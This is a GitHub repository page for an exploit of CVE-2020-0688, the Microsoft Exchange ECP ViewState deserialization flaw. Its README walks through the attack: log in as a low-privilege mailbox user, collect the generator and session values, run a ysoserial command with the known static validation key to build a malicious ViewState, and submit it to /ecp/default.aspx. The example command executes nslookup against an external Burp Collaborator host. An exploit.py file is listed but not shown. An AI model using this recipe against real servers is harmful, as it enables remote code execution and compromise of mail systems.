Skip to content
cve-2020-0688
Python
Branch: master
Clone or download

Latest commit

Latest commit d3d5581 Feb 26, 2020

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Update README.md Feb 26, 2020
exploit.py Update exploit.py Feb 26, 2020

README.md

cve-2020-0688

cve-2020-0688

Login with a user with an email address privliage is nothing to worry about.

Grab - __VIEWSTATEGENERATOR from page source Grab - the value of ASP.NET_SessionId cookie for viewstateuserkey value

Download YSO Here

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

GET TO:

https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>

The Exploit.py is untested and need a demo system to fire up and play with.

You can’t perform that action at this time.